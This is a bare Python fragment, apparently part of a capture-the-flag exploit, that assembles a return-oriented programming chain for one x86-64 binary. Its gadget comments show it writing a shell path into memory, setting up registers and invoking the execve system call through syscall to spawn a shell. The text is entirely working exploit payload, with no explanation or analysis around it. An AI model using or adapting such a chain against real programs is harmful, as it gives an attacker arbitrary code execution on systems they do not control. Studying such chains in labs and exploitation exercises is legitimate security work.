payload = p64(0x402303)
#0x0000000000402303: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40c0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x402303)
# 0x0000000000402303: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40c0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40c070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x402785)
# 0x0000000000402785: pop rbx; ret; 
payload += p64(0x0)+p64(0x4025cf)
# 0x00000000004025cf: mov eax, ebx; add rsp, 0x18; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4024e3)
# 0x00000000004024e3: or rax, rsi; add rsp, 0x18; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x402a2f)
# 0x0000000000402a2f: xchg eax, edx; add rsp, 0x18; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x402785)
# 0x0000000000402785: pop rbx; ret; 
payload += p64(0x3b)+p64(0x4025cf)
# 0x00000000004025cf: mov eax, ebx; add rsp, 0x18; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x405996)
# 0x0000000000405996: syscall; 
payload += b''
